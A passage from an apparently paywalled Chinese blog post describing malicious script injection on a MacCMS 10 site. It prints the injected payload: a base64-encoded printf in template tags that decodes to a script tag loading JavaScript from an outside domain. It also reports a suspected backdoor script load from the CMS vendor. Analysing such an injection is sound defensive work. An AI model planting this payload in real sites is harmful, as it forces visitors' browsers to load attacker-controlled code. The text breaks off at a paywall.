本文讲述了作者在使用苹果CMS10建立网站时遇到的挂马问题,分析了可能的原因是CMS作者故意留下的JS漏洞或后门。详细介绍了挂马的表现,如播放视频时加载奇怪字符,疑似DOM XSS攻击。作者怀疑这可能是作者为增加广告收入而进行的跳转。提出了更换CMS系统的解决办法,推荐了海洋CMS、马克斯CMS等替代方案。
最近闲无事想建个站来玩玩,但是又不想写于是乎就找了搜索了一下,苹果cms就出现在搜索引擎上面了,看来苹果cms的SEO做的还是不错的.
被挂马表现:
- 播放视频时,有一定的概率会加载
http://union.maccms.com/html/top10.js - 苹果cms后台某处或者采集的资源打印奇怪的字符比如
{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hZDIxMjMubHNqcG9ybi50b3AvdXBsb2FkL2FhYWEuanM+PC9zY3JpcHQ+"))}{endif-A}{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hZDIxMjMubHNqcG9ybi50b3AvdXBsb2FkL2FhYWEuanM+PC9zY3JpcHQ+"))}{endif-A}{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hZDIxMjMubHNqcG9ybi50b3AvdXBsb2FkL2FhYWEuanM+PC9zY3JpcHQ+"))}{endif-A}
解码其中的Base64的字符串后是
<script src=https://ad2123.lsjporn.top/upload/aaaa.js></script>
这也就是传说中的DOM XSS攻击
其实苹果CMS一直以来都是加密了最重要的播放器载入js,而且一直在打开播放页的时候 player.js 会载入一个,//union.maccms.com/html/top10.js 文件,最
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
